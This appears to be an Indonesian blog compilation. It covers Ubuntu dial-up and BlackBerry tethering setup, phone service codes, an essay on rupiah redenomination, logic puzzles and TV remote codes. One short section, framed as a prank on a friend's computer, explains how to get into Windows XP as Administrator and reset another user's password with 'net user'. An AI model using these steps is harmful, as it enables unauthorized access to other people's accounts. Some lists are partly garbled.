Setting Internet di Ubuntu (Dial-up)


Dial-Up akses adalah suatu format untuk mengakses Internet di mana klien menggunakan suatu modem yang dihubungkan ke suatu komputer dan suatu jaringan telepon untuk mengkoneksikan telepon kepada Internet Service Provider ( ISP) yang mana kemudian disalurkan ke Internet.

Konfigurasi Koneksi Dial-Up di Ubuntu

Ubuntu memiliki beberapa fasilitas untuk konfigurasi koneksi dial-up. Ada beberapa cara untuk mengkonfigurasikan koneksi dial-up. Diantaranya;

1) Menggunakan Network Option di Ubuntu

2) Menggunakan gnome-ppp

3) Menggunakan kppp (Untuk Kubuntu)

4) Menggunakan wvdialconf & wvdial

5) Menggunakan pppconfig & pon/poff

Pertama, kamu harus memastikan driver modem kamu telah terinstal dengan benar. Jika kamu ingin lebih detail tentang driver modem di ubuntu dan instalasinya, here.

Sekarang kita akan lihat 3 cara bagaimana mengkonfigurasikan dialup koneksi di ubuntu

– Permulaan –

Sebelum mengkonfigurasi koneksi Dial-Up, kamu harus mempunyai informasi berikut dari ISP mu

1) Username

2) Password

3) Dial-up Number

– Configuring Koneksi Dial-Up menggunakan Networking Options –

System —> Administration —> Networking

kamu pilih Modem connection, dan klik properties.

yang pertama harus kamu lakukan adalah.. memberi centang pada pilihan Enable this connection. Kemudian isi Phone number, Username dan Password yang telah kamu dapatkan dari ISP kamu

Kemudian isikan Device sesuai perangkat yang kamu miliki.

Sekarang kamu klik tab Options, dan centang.

kamu dapat menggunakan Gnome Modem Monitor dan Network Monitor Panel jika kamu ingin mulai dan berhenti atau memonitor modem connections.

– Konfigurasi Koneksi Dial-Up menggunakan pppconfig –

Jalankan terminal dari Applications > Sistem Tools > Terminal

Ketikkan pada terminal :

sudo pppconfig

Di sini kamu harus memilih “ Create a connection” pilih ok dan tekan enter

Di sini kamu masukkan nama Provider kamu. Untuk contoh, saya masukkan “comcast” pilih ok dan tekan enter

Pada layar berikutnya, kamu harus memilih “ Dynamic – Use dynamic DNS” pilih ok dan tekan enter

Kamu harus memilih Authentication method. Di sini saya memilih “chat :Use chat for login/password :Authentication” pilih ok dan tekan enter

Kosongkan saja, pilih ok dan tekan enter

Kosongkan saja, pilih ok dan tekan enter

Masukkan Username yang diberikan oleh ISP mu. Pada contoh ini sayai menggunakan “ ruchiw” pilih ok dan tekan enter.

Masukkan Password yang diberikan oleh ISP mu. dalam contoh ini saya menggunakan “ myfirstpassword” pilih ok dan tekan enter

Masukkan Modem Speed “ 115200″ pilih ok dan tekan enter

Pilih metode pengoperasian telpon “ Tone” pilih ok dan tekan enter

Masukkan dial-up number ISP kamu. pilih ok dan tekan enter

Pilih metode untuk mendeteksi modem mu pilih “yes” jika kamu ingin mode otomatis. atau “no” jika kamu ingin mengkonfigurasinya secara manual. disini saya akan memilihj konfigurasi secara manual.

Pilih modem port. Disini saya akan memakai konfigurasi default. pilih ok dan tekan enter

Disini kita dapat melihat informasi yang lengkap untuk koneksi ISP kamu. Dalam)contoh ini “comcast”

Finish, pilih ok dan tekan enter

– Menghubungkan ke ISP kamu –

Ketikan perintah berikut pada terminal :

sudo adduser YOURNAMEHERE dip

sudo adduser YOURNAMEHERE dialout

# menghubungkan ISP “ comcast”

pon comcast

# menutup koneksi ISP “ comcast”

poff comcast

atau, kamu bisa menggunakan perintah berikut :

pon

poff

Kamu dapat memeriksa pesan terakhir yang dihasilkan oleh perintah ini dengan

# menunjukkan status pesan yang dihasilkan oleh pon dan poff

plog

Kode Rahasia Handphone


Kode akses Nokia

*#30# : Menampilkan ‘private number’ yang menghubungi anda.
*#73# : Mereset timer ponsel dan skor game (pada beberapa ponsel).
*#7780# : Mengembalikan ke setting pabrik (factory setting).
*#2820# : Alamat IP perangkat Bluetooth (untuk ponsel yang mempunyai Bluetooth).
xx# : Akses cepat ke nama/nomer telepon di phone book ponsel, misalnya 20#.
Tombol off : Menekan dengan singkat, untuk berpindah antar profile.
*3370# : Mengaktifkan EFR(Enhanced Full Rate) Codec (tidak berlaku di ponsel Symbian).
#3370# : Menonaktifkan EFR Codec.
*#4270# : Mengaktifkan Half Rate Codec.
*#4270# : Menonaktifkan Half Rate Codec.
*#0000# : Menampilkan versi software ponsel. *#9999# : Kode alternatif jika *#0000# tidak bekerja.
*#06# : Melihat nomor IMEI (Internasional Mobile Equipment Identity).
*#21# : Mengecek nomor pengalihan “All Call” yang digunakan.
*#2640# : Menampilkan kode keamanan ponsel yang digunakan.
*#43# : Mengecek status “Call Waiting”.
*#61# : Untuk mengecek nomor pemanggil yang dialihkan ketika tak anda jawab.
*#62# : Mengecek nomor pemanggil yang dialihkan ketika ponsel anda di luar jangkauan.
*#67# : Mengecek nomor pemanggil yang dialihkan ketika ponsel anda sedang sibuk.
**21*number# : Menghidupkan pengalihan “All Call” pada nomor yang diisi.
**61*number# : Menghidupkan pengalihan “No Reply” pada nomor yang diisi.
**67*number# : Menghidupkan pengalihan “On Bussy” pada nomor yang diisi.
*#67705646# : Mengganti logo operator logo pada Nokia 3310 dan 3330.
*#746025625# : Menampilkan status SIM Clock.
*#7760# : Menampilkan kode pabrikan (sebagian besar ponsel tipe lama).
*#92702689# : Memunculkan : 1. Serial Number, 2. Date Made, 3. Purchase Date, 4. Date of last repair, 5.Transfer user data.
Keluar dari mode ini harus merestart ponsel ( pada beberapa ponsel ).

Kode akses Sony Ericsson

*#06# : Melihat nomor IMEI (Internasional Mobile Equipment Identity).
*#0000# : Mereset bahasa kembali ke English.
> * < < * ” untuk melihat semua teks yang terdapat pada ponsel.
< * * ‘ 2 kali untuk memilih “Hide Id?” dan tekan ‘Yes’.
3. Mengecek level batere ketika ponsel mati (off ).
Tekan ‘No’ secara cepat 1 x dan tunggu hingga tampilan baterai terlihat.
4. Menyimpan nomor di memori ponsel (bukan SIM Card).
Ikuti prosedur normal untuk menyimpan nomor. Ketika tampilan untuk menyimpan terlihat tekan ‘#’ sekali dan lokasi yang diinginkan, atau tekan ‘#’ 2 kali untuk melihat posisi lanjutan.
5. Menghubungi nomor dari pesan SMS.
Mengarahkan kursor pada nomor yang tertulis, kemudian tekan “Yes”.

Shortcut Penampilan Gambar :
(Berlaku di sebagian besar ponsel Symbian).
Ketika melihat image atau gambar di galeri, tekan :
1 : untuk memutar gambar ke kiri.
2 : untuk memutar gambar ke kanan. 5 atau 7 : untuk memperbesar (zoom) gambar.
* : untuk tampilan fullscreen atau non fullscreen.
Catatan : perintah angka di atas bisa berbeda di setiap ponsel.

Hard Reset : Peringatan !!! Semua data ponsel akan hilang.
Dalam keadaan ponsel mati (off), tekan secara bersamaan tombol telepon (bicara), angka 3, dan tombol * (bintang). Kemudian dalam keadaan menekan ketiga tombol tersebut, tekan tombol On. Trik ini berlaku di sebagian besar ponsel Nokia.

Setting Blackberry 8520 sebagai modem di Ubuntu


sudo apt-get install python python-wxgtk2.8 libusb-dev ppp python-usb libc6-dev g++ gcc make build-essential

wget http://bitbucket.org/tcolar/berry4all/downloads/bbtether-0.3l.tgz

tar -zxvf bbtether-0.3l.tgz

lsusb|grep Motion
Bus 003 Device 007: ID 0fca:8004 Research In Motion, Ltd.

cd bbtether/conf/
cp generic isat
cp generic-chat isat-chat

Cari parameter “user” dan “password” lalu masukan user, password sesuaikan dengan setting default provider terkait, jangan lupa untuk mengganti “connect “/usr/sbin/chat -f conf/generic-chat” menjadi “connect “/usr/sbin/chat -f conf/isat-chat”

OK ‘AT+CGDCONT=1,”IP”,”wap.voicestream.com”
OK ‘ATD*99#’
Silahkan rubah “wap.voicestream.com” menjadi “indosatgprs“, jika provider menggunakan DIAL UP number yang berbeda, silahkan ubah parameter “ATD*99#” nya.

:~/bbtether$ sudo python bbtether.py isat

ping pakelinux.com
PING pakelinux.com (69.164.193.181) 56(84) bytes of data.
64 bytes from vps1.ngadimin.com (69.164.193.181): icmp_req=1 ttl=47 time=839 ms
64 bytes from vps1.ngadimin.com (69.164.193.181): icmp_req=2 ttl=47 time=671 ms

~/bbtether$ sudo ./berry4all.sh

Redenominasi Rupiah dan Trauma Sanering


Darmin Nasution, gubernur baru Bank Indonesia, mengawali kiprahnya dengan sebuah wacana menarik tentang rencana redenominasi rupiah (03/08) yang akan mulai dilakukan sosialisasinya mulai tahun 2011 dan diterapkan pada tahun 2022. Sebuah lontaran yang pasti menghangatkan suasana, apalagi Indonesia adalah sebuah negara demokrasi yang sedang berkembang, sontak topik ini menjadi perbincangan bagi semua kalangan terutama para ekonom, politisi, dan pelaku bisnis. Banyak yang memandang sinis akan hadirnya kebijakan ini. Harap maklum masih banyak yang menyamakan redenominasi dengan sanering.

Redenominasi bukan sanering atau devaluasi. Sanering (berasal dari bahasa Belanda) adalah pemotongan nilai mata uang sekaligus nilai tukarnya. Kalau tadinya kita mempunyai uang Rp 1.000 dan dapat membeli barang, katakanlah beras 1 kg, dengan nilai yang sama yaitu Rp 1.000, lalu setelah diberlakukan sanering menjadi Rp 1, maka kita tidak dapat lagi membeli beras 1 kg tersebut dengan Rp 1 yang kita miliki. Indonesia melakukannya pada tahun 1965 ketika terjadi hiper inflasi dan mata uang pada saat itu dipatok terhadap mata uang asing. Karena nilai rupiah sudah tidak mencerminkan nilai tukar riilnya lagi, maka sanering adalah pilihan pahit yang harus dilakukan pemerintah pada saat itu. Sanering menyisakan trauma hebat bagi masyarakat Indonesia yang mengalami. Bagaimana tidak, di saat kondisi politik tanah air yang sangat tidak stabil setelah terjadinya G30S, lalu harga-harga yang melesat naik tinggi karena hiper inflasi, lalu uang yang dipunyai masyarakat tiba-tiba berkurang nilainya dari Rp 1000 menjadi Rp 1. Kejadian akibat kebijakan ini terus menghantui masyarakat yang menyisakan trauma serius akan kebijakan moneter dan juga menghinggapi pada pengambil kebijakan moneter.

Sedangkan devaluasi  atau revaluasi adalah menyesuaikan nilai mata uang dalam negeri dengan menurunkan nilainya terhadap mata uang asing atau acuan. Misalnya rupiah terhadap dollar Amerika Serikat. Untuk hal ini Indonesia sudah sangat sering melakukannya ketika Pemerintahan Orde Baru yang  juga menerapkan kurs tetap (fixed currency). Devaluasi dilakukan karena kurs yang dipakai sudah tidak mencerminkan nilai tukar riil uang itu sendiri, sehingga ketika nilainya dipatok pada angka tertentu maka pemegang otoritas seaktu-waktu harus menyesuaikan dengan nilai tukar riilnya.

Redenominasi sendiri adalah penggantian nilai mata uang tanpa menurunkan atau menaikkan nilai tukar riilnya. Sama sekali berbeda dengan sanering atau devaluasi. Masih dengan contoh di atas, jika kita tadinya punya uang Rp 1.000 dan cukup untuk membeli 1 kg beras, maka ketika dilakukan redenominasi dari Rp 1.000 menjadi Rp 1, maka harga 1 kg beras dapat dibeli dengan Rp 1 tersebut . Dari ilustrasi sederhana ini sepertinya kebijakan ini akan sangat mudah untuk diterapkan tetapi faktor-faktor  di luar ekonomi seperti sosial, politik, dan tentu saja psikologi masyarakat menjadi pertimbangan.

Dalam teori ekonomi, redonominasi tidak menimbulkan dampak apapun. Berbeda dengan sanering dan devaluasi yang disamping punya dampak langsung terhadap nilai tukar dari uang yang dipegang oleh masyarakat, juga dampak ekonomi lainnya akibat lanjutan dari kebijakan ini yang meliputi ekspor-impor, inflasi, hingga pertumbuhan ekonomi.

Denominasi rupiah saat ini adalah Rp 100000 untuk pecahan tertinggi lalu berturut-turut pecahan 50000, 20000, 10000, 5000, 2000, 1000, 500, 200 dan Rp 100 untuk pecahan terendah.  Pecahan 100 ribu untuk saat ini adalah pecahan uang nomor 3 tertinggi di dunia setelah Zimbabwe dengan 10 juta dollar Zimbabwe dan Vietnam dengan 500 ribu Dong.

Denominasi rupiah saat ini memperlihatkan ‘rendahnya gengsi’ mata uang rupiah terhadap mata uang asing. Di negara Asean dan bahkan Asia, nilai Rupiah adalah yang kedua terkecil nilainya setelah Vietnam. Angka nol dalam rupiah sudah mengalami ‘inefisiensi’, sehingga sering dalam penulisan harga selalu dipakai ‘denominasi tambahan’, misalnya dalam ribuan atau bahkan jutaan.

Kebijakan redenominasi biasanya diambil oleh negara-negara yang nilai mata uangnya kecil akibat perekonomian sebelumnya yang tanpa kontrol sehingga mengalami hiper inflasi. Setelah negara tersebut melakukan stabilisasi perekonomian terlebih dahulu, baru kemudian dijajaki tentang kemungkinan penerapan redenominasi. Redenominasi akan sangat beresiko ketika perekonomian belum mantap terutama jika inflasi belum dapat dikendalikan dengan baik oleh otoritas moneter.

Salah satu contoh yang berhasil adalah Turki. Turki mengalami hiper inflasi hebat pada akhir tahun 1960-an dan awal 1970-an hingga otoritas moneter di sana mengeluarkan denominasi Lira hingga pecahan 1 juta. Denominasi ini berlaku cukup lama hingga mencapai 3 dekade karena otoritas moneter Turki lebih sibuk melakukan stabilisasi perekonomian. Baru pada tahun 1990-an otoritas moneter di Turki mulai mensosialisasikan kebijakan redenominasi lira ketika perekonomian Turki mulai stabil, terutama inflasi yang rendah dan sangat terkendali. Lalu pada tahun 2005 ketika perekonomian Turki sedang dalam keaadaan mantap otoritas moneter melakukan redenominasi dengan menghilangkan 6 angka nol pada nilai 1 juta. Jadilah nilai 1 Lira sama dengan nilai tukar 1 juta lira yang lama. Kebijakan ini diterapkan pada tanggal 1 Januari 2005, tetapi masih diberikan tenggang waktu yang cukup hingga 2009 sampai uang lama yang beredar di seluruh dunia telah tertukar dengan uang yang baru semua.

Selain Turki, negara-negara lain yang cukup berhasil melakukan redenominasi mata uangnya adalah negara-negara bekas Uni Soviet diantaranya adalah Azerbaijan pada 2009 dimana 5.000 Manat (lama) menjadi 1 Manat (baru) , lalu Turkmenistan pada tahun 2009 dengan mata uang dan denominasi yang sama dengan Azerbaijan.

Pengelaman negara lain selain redenominasi adalah penggantian mata uang dari yang lama ke yang baru, dimana kebijakan ini senada dengan redenominasi. Dalam perlakuan akuntasi ekonominya, penggantian ini tidak menimbulkan naik/turunnya nilai tukar riil uang yang dipegang oleh masyarakat. Contoh yang paling menyita perhatian adalah kebijakan mata uang tunggal Eropa pada tahun 2002 dimana beramai-ramai 12 negara anggota Uni Eropa mengganti mata uangnya ke Euro.  Tidak sedikit terjadi kegagapan di negara-negara tersebut walaupun tingkat pendidikan penduduknya sudah sangat maju dan merata. Contohnya di Belanda yang sebelum Euro memakai mata uang Gulden. Belanda sudah menyatakan akan bergabung dengan zona Euro pada tahun 1999 atau 3 tahun sebelum penerapannya. Sosialisasi dilakukan secepatnya guna mengejar tenggang waktu penerapan, tentu saja optimalisasinya sangat kurang.  Lalu ketika diterapkan pada tanggal 1 Januari 2002 dengan kurs 1 Euro = 2,2 Gulden kegagapan masih terjadi di sana-sini. Skenarionya para pelaku pasar akan menyesuaikan dengan kurs tersebut, tetapi yang terjadi justru penggampangan kurs dimana 1 Gulden disamakan dengan 1 Euro. Akibatnya inflasi pada tahun 2002 cukup mengkhawatirkan otoritas moneter Belanda karena harga-harga (seolah-olah) tiba-tiba naik.

Indonesia saat ini masih terus berjuang mengangkat perekonomian dan tentu saja menyetabilkan inflasi dan nilai mata uang rupiah semenjak mengalami krisis moneter hebat pada tahun 1998 lalu. Krisis tersebut telah mengantarkan Rupiah menukik nilai tukarnya. Kalau dulu 1 dolla AS masih sekitar Rp 2000-an, kini tidak pernah turun dari Rp 9000. Stabilnya nilai Rupiah pada kisaran tersebut dalam jangka waktu yang cukup lama dapat menjadi landasan dalam upaya melakukan redenominasi Rupiah, tentunya faktor-faktor yang lain juga harus diperhatikan.

Alternatif Redenominasi

Lalu bagaimana kemungkinan redenominasi tersebut? Wacana pertama yang dimunculkan BI adalah menghilangkan tiga angka nol, artinya Rp 1000 (lama) akan menjadi Rp 1 (baru).  Nilai ini akan menjadikan Rupiah mendekati nilai mata uang Yuan milik China, dan Dollar Hongkong. Jika denominasi ini diterapkan, dengan memperhatikan denominasi yang lama maka akan ada 3 pecahan uang dibawah nilai Rp 1 atau menjadi pecahan sen rupiah yang meliputi Rp 0.5 untuk Rp 500 lama, lalu Rp 0.2 dan 0.1 untuk Rp 200 dan Rp 100 lama. Pemakaian denominasi ini tidak begitu rumit karena hanya 3 pecahan di bawah Rp 1. Bandingkan dengan Euro atau Dollar AS yang mempunya pecahan sen hingga 10 pecahan dari 0,01 hingga 1 Euro atau 1 Dollar AS.

Pilihan kedua adalah menghilangkan 2 angka nol, artinya Rp 100 (lama) menjadi Rp 1. Jika ini yang diterapkan, dengan mengacu denominasi yang lama maka Rp 1 akan menjadi denominasi terkecil dan tidak ada lagi uang pecahan di bawah Rp 1. Dari segi kerumitan, sepintas opsi ini lebih memungkinkan dibandingkan opsi pertama. Opsi ini juga akan menempatkan Rupiah menjadi setara Yen milik Jepang.

Pilihan ketiga dan keempat adalah menghilangkan 1 angka nol dan 4 angka nol. Untuk 1 angka nol maka yang terjadi adalah tidak akan ada lagi pecahan dibawah Rp 1. Tetapi kebijakan ini cenderung ‘nanggung’ karena dengan memperhatikan denominasi yang lama maka Rp 1 tetap tidak akan pernah ada karena sudah sangat lama Rp 10 ‘punah’ dari peredaran. Lalu jika menghilangkan 4 angka nol, nilai Rupiah akan menjadi sangat tinggi dan otomatis ‘gengsinya’ pun tinggi. Bayangkan jika Rupiah setara dengan Dollar AS dan Euro, tentu akan sangat membanggakan semua pemegang Rupiah. Namun akan banyak pecahan di bawah Rp 1, yaitu Rp 0.5 untuk Rp 5000, Rp 0.1 untuk Rp 1000, lalu berturut-turut Rp 0.05, Rp  0.02, dan Rp 0.01 untuk Rp 500, Rp 200, dan Rp 100. Jadi akan ada 5 pecahan di bawah Rp 1.

Kerumitan yang terjadi di masyarakat tentunya adalah masalah pecahan sen di bawah Rp 1. Penduduk Indonesia yang menurut BPS mempunyai jumlah orang miskin dengan penghasilan dibawah 2 dollar AS per hari (Rp 20000 per hari) tentu akan sangat dibuat sibuk oleh redenominasi ini. Mereka akan sibuk melakukan convert uang mereka yang akan banyak menjadi sen rupiah. Jika penduduk miskin tersebut diasumsikan juga mempunyai tingkat pendidikan yang rendah pula, maka pelajaran matematika pembagian juga pasti mereka lemah, dan tentu saja makin susah membuat masyarakat golongan ini menerima redenominasi rupiah baru.

Dari 4 pilihan tersebut sebaiknya dipilih yang paling sedikit pecahan sen atau bahkan tanpa pecahan sen dibawah Rp 1. Tampaknya opsi pertama (menghilangkan 3 angka nol) dan kedua (menghilangkan 2 angka nol) adalah alternatif yang lebih memungkinkan untuk dipilih. Opsi kedua bahkan tidak ada pecahan sen dibawah Rp 1. Jika ini yang dipilih maka Indonesia akan mempunya Rupiah yang berdiri setara dengan Yen Jepang yang tentunya juga cukup ‘berwibawa’.

Kebijakan ini, sekali lagi dari segi teori ekonomi seharusnya tidak akan menjadikan dampak apa-apa karena tidak ada perubahan nilai secara riil. Namun, kondisi sosiografi masyarakat yang rentan akan isu-isu yang membuat rasionalitas penduduk berkurang tentu harus menjadi perhatian tersendiri. Kebijakan apapun memungkinkan akan adanya pencari rente (rent seeker), baik dengan motif ekonomi maupun politik, yang akan memanfaatkan kepanikan masyarakat. Yang punya motif ekonomi tentu saja akan ‘memainkan’ kepanikan itu dengan mengambil aksi untung pada Pasar Modal dan Pasar Uang, sedangkan yang punya motif politik bisa menjadikan kebijakan ini sebuah peluru untuk ‘menembakkan’ ke pihak lain.

Untuk itu, Pemerintah dan BI, sebagaimana pengalaman Turki dan negara-negara lain dalam menerapkan kebijakan ini perlu melakukan sosialisasi yang sangat intens, panjang dan berkualitas sampai masyarakat mempunyai pengetahuan yang cukup lengkap dan sempurna (perfect foresight) akan kebijakan ini. Terjadinya informasi yang tidak sempurna (asymmetric information) akan menjadi pintu masuk para pencari rente dan mereka akan memanfaatkan keadaan ini demi keuntungan mereka. Sosialisasi yang baik tidak akan membuat masyarakat kehilangan rasionalitasnya akan nilai tukar yang mereka pegang.

Bangsa Indonesia adalah bangsa yang besar, salah satu kebesaran itu harus kita tunjukkan bahwa kita bangga memegang uang Rupiah. Untuk jangka panjang, redenominasi Rupiah adalah keniscayaan. Lupakan trauma sejarah, karena redenominasi bukanlah sanering.

*) Artikel  ini tulisan versi asli dari artikel opini dengan judul yang sama yang dimuat di Media Indonesia Jumat, 6 Agustus 2010.

**)Muhyiddin, MSc, MSE adalah ekonom, bekerja di Bappenas. Tulisan ini opini pribadi dan tidak mencerminkan pandangan institusi dimana penulis bekerja

Source: http://www.bappenas.go.id/blog/?=650

Soal-soal Logika (Repost)


  • ada seekor siput jatuh ke dalam sumur, sumur itu tingginya 30 meter.
    Si siput ingin mencapai puncaknya, perjalananya gini : waktu siang siput naik 3 meter, tapi waktu malam siput turun 2 meter
    berapa hari siput itu nyampe ke puncak?
  • Pada 1 Februari 2044, tumbuh 1 bunga anggrek di sebuah taman. Bunga anggrek ini bertambah 2x lipat Setiap hari nya. hingga, akhir bulan februari pun taman itu di penuhi oleh bunga anggrek. Pada tanggal berapakah 1/2 taman di penuhi oleh bunga anggrek?
  • Suatu hari ada seorang bapak yang sebentar lagi akan meninggal dunia.
    Bapak tersebut mempunyai harta warisan yaitu
    81 pohon apel yang setiap pohon mempunyai jumlah buah apel yang berbeda.
    Pohon ke-1 berbuah 1 apel
    Pohon ke-2 berbuah 2 apel
    Pohon ke-3 berbuah 3 apel
    dst
    .
    .
    .
    Pohon ke-81 berbuah 81 apel
    Sedangkan bapak itu mempunyai 9 orang anak.
    Bapak tersebut bingung bagaimana caranya membagi harta warisan itu secara adil merata kepada sembilan anaknya.
    Bagaimana pembagian pohonnya kepada semua anaknya?

Hacking Login pada WindowsXP


Mungkin tulisan ini akan berguna buat elu2 yang mau ngusilin kompie temen elu yang ngasih password di kompie nya.

Langsung aja ah !!!!!!!!

1. Ketika muncul formlogin nya, teken aja ctrl+alt+del+del

2. Lo ketik aja di kolom username nya = Administrator

3. kolom passwordnya kosongin aja !!

4. Masuk Dah !!

5. Sekarang buka comandprompt !!

6. ketik = net user

7. pilih user temen kamu itu !

8. ketik = net user (user temenmu) *

9. kalo gak salah gitu dah

Selamat mencoba !!!!

Cara Setting Remote TV Universal


INTER_DIGI_SAT_UNIVERSAL_REMOTE_CONTROL

1. Tekan “set” (jangan lepas) sampai lampu menyala, kalau cara ini tidak berhasil coba tekan “set” (jangan lepas) lalu tekan “power” setelah lampu nyala, lepaskan kedua tombol.
2. Tekan angka”1″, tekan lagi angka “0”, terakhir tekan angka”2″.
3. Setelah angka terakhir ditekan, lampu akan padam (selesai)

ADVANCE
104,120,102,106,103,187,181,224,073
ADVANTE
181,120,102,104,181,224,073
AICO
102,104,181,131,187,073,103,106,025,224
AIWA
009,057,058,102,104,181,224,073,103
AKAI
149,053,056,079,102,104,181,224,073,103
AKARI
013,213,140,015,102,104,181,224,073,103
AKARTON
102,104,073,053,103
AKIRA
016,115,102,178,045,224,181,073,104,124,103,147,151
ALL BRANO
181,102,104,073,153,103,024,131,181,224,187
ASANO
061,102,104,181,224,073,103
ASATRON
073,056,053,102,104,106,103,187,181,224
AUDIOTRON
181,102,103,131,187,073,104,025,224,103
AUHTECH
102,187,120,104,181,073,224,103
AVANTE
181,102,103,131,187,104,224,073,103
BASOKE
017,151,253,150,053,120,024,147,000
B/E (MESIN TV)
102,104,106,103,187,181,073,224
BIG BEAUTY
017,151,253,152,147,024,000
BLUEBELLA
060,290,053,253,024,043,102,104,181,224,073
BLUEESKY
053,102,187,027,043,104,120,024,181,073,103
BOMBA
103,088,073,102,104,060,187,181,224,073,103
CASINO
151,017,152,150,053,120,024,147,253,000
CHANGHONG
002,014,191,182,128,089,008,009,092,102,104,181,224,073,093,010,011,016,026,028,053,051,052,057,058,067,071,086,087,100,159,162
CHANCHONG LCD
002,014,091,182,128,089
CHUNLAN
142,188,208,102,104,187,181,224,073,103
CICHI
118,034,086,027,224,054,120,053,104,102,103,181,073,187
CLARION
024,043,102,104,181,224,073
CRYSTAL
207,102,104,131,181,224,187,073,103,106
DAEWOO
042,012,031,102,104,181,224,187,073,103,106
DETRON
053,212,102,104,131,181,187,073,103,106,224
DAICHI
024,043,102,104,131,181,187,073,224,103
DAZZ
120,102,104,181,224,073,103.
DAIKEN
102,104,131,181,187,073,103,181,224,073
DAT
073,102,104,053,103,024,131.181,224,187
DIGIMEDIA
102,104,131,181,187,073,103,224,106,025
DIGITEC
000,147,151,017,253,152,024,150,053,120,043.
DISCSTAR
151,092,102,104,181,224,073,103.
DIVA
000,147
DVS
102,104,073,053,103,024,131,181,224,187
ETRON
102,104,053,073,224,181,103.
FORTUNE
120,102,104,106,103,187,224,073,181
FUJICOM
102,224,181,104,073,103
FUJITEC
097,077,258,024,043,102,104,131,181,187,073,103,224,103.
FUJI ELECTRIC
223,008,043,102,077,189,024,104,253,120,017,224,181,073,032,103
FUJIWA
102,187,224,104,073,181,103.
FULI
047
FURICHI
224,104,102,181,073,103
FUTACHI
104,181,102,073,106,131,181,224,103
GALAXI
102,104,181,131,106,073,187,103,224,103.
GENERAL
040,102,104,131,181,187,073,103,224,103
GOLDSTAR
140,024,009,019,040,043,098
GRAND MASTER
017,151,253,053,000,024,152,024,152,024,150,120,147
GRUNDING
190,201,280,080
HAIER
178,296,103,105,112,118,119,175,185,186,187,188,201,205,206,218,060
HARCO
061,102,104,073,053,103,024,131,181,224,187
HIMIDA
131,079,075,250,102,187,181,104,199,101,073
HITACHI
187,007,240,251,033,280,080,015,014,027,006,008,010,048,179
HITACHI FUJIAN
007,187,102,104,181,224,073,011,015,014,024,028,053,043,040,043,053,056,006,008,010,048,179,060,061,065,079
HUI CIA
102,187,104,224,103
HISENSE
006,007,008,010,014,015,025,135,045,046,103,105,107,115,116,128,129,130,131,138,139,171,172,173,174,185,186,187,188,189,190,191
HIMEIJI
073,102,104,103,224,181
HONGSU
131,188,039,102,104,181,224,073,103
HUANYU
011,015,024,040,043,053,056,009,057,058,079
IGHI
(118->pip),034,086,027,095,054,120,053,104
ICHIBAN
073,017,151,253,000,152,024,147
ICHIKO
104,102,187,181,131,073,224,103
IKAWAGUCHI
102,104,131,181,187,073,103,106,025,224.
INDOTEC
120,102,104,181,224,073,250,103
INTEL
259,013,213,102,104,181,224,073,250,103
ITAMI
051,102,104,.073,053,024,103
ITECH
181,102,104,224,073,103
JENSONIC
120,102,104,181,073,224,103
JHONSON
024,043,102,104,224,073,103
JINSING ITAMI
120,102,104,181,073,224,103
JONSA
131,102,104,181,187,073,224,103,106,025
JVC
161,004,089,024,156,103
KANSLIR
120,102,104,181,224,073,103
KASUMI
104,102,106,103,187,181,073,224
KAWACHI
104,102,181,187,073,224,073,103
KCL
053,102,104,181,224,073,053,103
KIMURA
095,102,104,073,053,103
KONKA
068,075,081,113,157,102,104,181,224,011,017,073,029,032,034,054,067,069,071,076,077,078,079,080,107,117,163,164,165, 177,210
KOREA
102,187,104,181,073,224,103
KOSIMA 025,024,043,102,104,181,224,073,103
LASER
024,043,102,104,1814,224,073,103
LENSA
053,102,104,181,224,073,103
LG
140,024,040,043,259,260,261,043,103
LG LCD
024,140
LUCKY STAR
039,073,224,102,104,181,106,103,025,131,187
MAGIC STREO
147,151,017,253,152,024,000
MAROTECH
120,102,104,181,224,073,103
MITOCHIBA
102,104,181,224,131,187,073,103,106
MITSUKOSHI
102,104,181,224
MATSUI
120
MAYAKA
120
MAZDA (MESIN TV)
102,104,106,103,187,224,073
MESIN TV
102,104,106,103,187,224,181,073
MINIMAX
147,151,017,253,152,000,024
MITSHUBISHI
011,051
MITZUNO
120,102,104,106,103187
MODERN
223,008,024,043,102,104,181,224,073103
MULTIMAX
102,104,073,053,024
NAKAI
104,102,181,131,187,073,103,106,025,224
NANOTEX
073,102,104,053,024,103
NATIONAL
020,001,014,015,021,022,103
NEC
089,140,006,011,016,004,025,053,056,024
NIDAI
102,187,104,181,224,073,103
NIKAI
120,073,187,131,181,102,104,103,106,224
NIKO
102,187,104,224,073,181,103 20
NIKON
009,057,058
NITECH
102,104,073,053,024,103
NYCAM
147,151,152,150,253,017,000
NORDMENDE
214,227,230
NINJA
147,017,151,253,152,150,024,000
OLYMPIC
104,053,102,187,024,043,151,120,103
ONMURA
102,104,073,053,024,095,103
OTRE
104,102,073,053,024,095,103
PANASONIC
020,001,014,015,021,022,059
Panasonic LCD
066,059,020,001,014,015,021,022
PANDA
001,011016021,022,024,025,026
PENSONIC
102,104,073,053,024,103
PHILIPS
024,039,040,043,141,(174-PIP)241,242
Philips LCD
174,024,241,242,039,040,043,141
PLASMA
181,104,102,131,187,073,103,106,224,025
PLY-GM 1490
151,152,150,253,017,000
POLYTEC
120,102,104,224,181,073,103
POLYTRON
147,151,017,253,152,024,150,053,120,043
POLIVISION
017,151,150,147,024,000,152
PRIMA
027,053,073,102,181,104,224,103
PROTEC
120,102,104,224,181,073,103
QUARTO
073,102,104,053,024,103
ROADSTAR
120,102,104,224,181,073,103
RCA
240,251, (lihat kode tv thomson)
ROWA
011,016,024,040,043,096,127,058,182
RUYI
011,015,024,040,043
SAAB
102,104,106,187,181,131,187,073,103,106,025,224
SAIJO
102,104,106,187,181,131,073,103,224
SAIGE
011,025,016,102,104,224,181,073,103
SAMSUNG
050,024,008,011,016,021,025037,039
SAMSUNG LCD
024,050
SANEX
086,102,181,104,224,073,103
SANKEI
092,102,104,224,181,073,103
SANKEN
040,024,215,181,102,104,224,073,103
SANSUI
120
SANYO
099,,223,008,036,007,014,015,035,053,056,079,105,132,133,134,202
SANYO LCD
223,099008,036,007,014,015,035
SEMRO
104,102,181,131,073,187,106,103,224
SHANGHAI
009,011,016,017,022,024,025,040,043,053
SHARP
003,018,016,025,135,136,137
SHARP LCD
136,137,003,018,135
SHERWOOD
016,02503(mesin TV)
SIERA
024,043
SINMENG
104,102
SINKO
102,187,181,104,224,073,103
SKYWORTH(RGB)
011,025,053,045,046,060,070,071,072,073
SONY
135,023,041,049,005,094,106,148,237,238
SONY LCD
023,135
SONYA
102,224,181,224,104,073,103
START
181,086,102,104,224,073,103
STEELE
102,104,181,224,073,103
SUGA
